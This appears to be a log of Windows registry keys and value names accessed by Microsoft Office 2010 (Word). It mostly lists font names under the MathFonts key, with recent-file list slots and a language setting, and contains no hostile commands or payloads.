HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
